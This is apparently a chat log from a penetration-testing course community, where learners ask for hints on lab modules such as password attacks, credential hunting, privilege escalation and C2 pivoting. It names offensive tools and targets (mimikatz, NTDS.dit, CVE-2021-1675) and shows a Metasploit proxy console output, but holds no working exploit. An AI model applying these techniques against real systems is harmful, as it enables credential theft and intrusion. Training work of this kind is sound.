"Credential Hunting in Network Shares" They have updated it and I cannot get anything out of snaffer.exe, apart from the user jb... which i rdp into and find nothing with snaffler again

reef sonnet
#

anyone experiencing lags in Session Security - skills assessment?
I can't download the pcap file(even after few resets it is still not letting me to download it)

wild sage
#

<@&861185840277487616>

#

He's spammed it in other chats as well

signal lava
ashen light
#

Hi can someone give me a hint on Skills Assessment from the File Upload Attacks Modul, please? (dm, I don't want to spoiler anything, I've already tried a few things)

wild sage
#

<@&861185840277487616>

north bramble
#

Hey has anyone done the Password attacks module? updated one? I am stuck on skills assessment as well as Pass the certificate parts.

north bramble
faint hamlet
summer bronze
#

Is there anyone who can teach me ethical hacking?

west arrow
summer bronze
#

@west arrow I already tried it

compact patrolBOT
waxen totem
#

@summer bronze See the link above

west arrow
#

bro wtf

#

i don't know what you meant by "ethical"

summer bronze
#

@west arrow I mean penetration testing

waxen totem
summer bronze
#

@waxen totem Okay I'll give it a try

nocturne trench
#

Hey, but how did you manage to utilize the mimikatz tool, since it is not present on the machine and you have to internet access?

vagrant shuttle
#

is anyone also stuck on the password attacks module? specifically the part on writing custom wordlists and rules
i can't seem to generate the password required

nocturne trench
#

ahaaa of course, thx

south marten
south marten
#

someone can help me with NTDS.dit

vagrant shuttle
vagrant shuttle
#

The writing custom wordlists and rules challenge in the password attacks module

#

I tried writing custom wordlists and rules and some other pre made rules but I can't get the right one to Crack the hash

south marten
#

you have the mut_password.list already?

vagrant shuttle
#

Yea I've made one myself but I've deleted the file 🥲

south marten
#

you already haver download the password-attacks

#

?

vagrant shuttle
#

i'm not too sure if i have what you are talking about

young sentinel
#

Somehow, I got it to work. This only thing different was I checked TCP and not UDP. Thanks for the help, hope I can do the same for some one else.

spark pine
#

hi guys im doing introduction to c2 operations with sliver and Im stuck in the pivoting section.

I compiled the sliver extension as instructed in the content but when I try to connect to my chisel server on the pwnbox it says chisel version differs.

To anyone who completed it what chisel server did you use?

faint hamlet
vagrant shuttle
#

just sent you a dm 🙏

south marten
prime cedar
#

Password reuse

faint hamlet
south marten
#

Maybe thats the reason Some of my modules have been bugged.

magic mango
#

Im completely blanking on what the command is to look at messages in IMAP, can i get a little help?

faint hamlet
dire coral
#

Hi People! New day - new attempt. Anyone for a hint on Password Attacks module? I need help on the second question of the Credential Hunting in Network Shares page.

faint hamlet
dire coral
#

Anyway, thx, I'll keep trying

shadow sedge
#

Information Gathering - Web Edition skills assessment. question : What is the API key in the hidden admin directory that you have discovered on the target system? . I found the API key, but for some reason, it's giving me that the key is wrong. I restarted the thing, and again, the same problem

wild sage
#

Need some help, with Windows Event Logs & Finding evil. I'm following the steps to conduct the Dll Reflective attack, but I'm having an issue trying to move calc to the desktop.

faint hamlet
faint hamlet
shadow sedge
#

just solved

limpid pond
#

Hello everyone, I am having trouble learning Windows Privilege Escalation Skills Assessment - Part I and am unsure how to locate CVE-2021-1675 for attack. How to determine if this vulnerability is being used to increase privileges

stark jacinth
#

Howdy, can anyone give me a hint how to solve this? DACL II - Logon scripts: Abuse the rights of the user 'Julio' and submit the flag in 'C:\Users\Benjamin\Desktop\flag.txt'. Cant really find any edges between Julio and Benjamin (and not Wayne that was pwned in Q1).

vale geyser
#

currently have a really weird issue....i can reach the VM (pub ip) via the browser, but when i curl or use hydra it can't reach it

#

nvm when restarting with a new service port it worked

#

probably issue with the vm

vernal dove
#

Yo

slow swift
#

Do any of you guys know the solution to this ?

leaden island
#

yo guys i cant run proxy server on msf

#
srvport => 9050
                                        
msf6 auxiliary(server/socks_proxy) > set version 4a                                                
version => 4a                                                                                                                           
msf6 auxiliary(server/socks_proxy) > run                                                                
[*] Auxiliary module running as background job 0.                                                                                       
msf6 auxiliary(server/socks_proxy) >                                                                                                    
[*] Starting the SOCKS proxy server                                                                                                     
[*] Stopping the SOCKS proxy server                                                                                                     
                                                                                                                                        
msf6 auxiliary(server/socks_proxy) > jobs                                                                                               
                                                                                                                                        
Jobs                                                                                                                                    
====                                                                                                                                    
                                                                                                                                        
No active jobs.                                                                       ```
#

keeps stopping by itself

leaden island
slow swift
gray yacht
sage void
#

I’m on the analyzing network traffic part of the password attacks how to I install pcreds ? I used git clone already what steps am I missing

gray yacht
leaden island
leaden island
#

Try setting $DISPLAY to :0

#

Id save the old vlaue too in case something goes wrong

sage void
gray yacht
slow swift
rustic sage
#

Hi, guys. hope everything goes well !
I'm in the skills assessment of the Linux privileged escalation module of the cpts but when i try to connect to the machine of the assessment. i always get a broken pipe. Does anybody has the same issue ?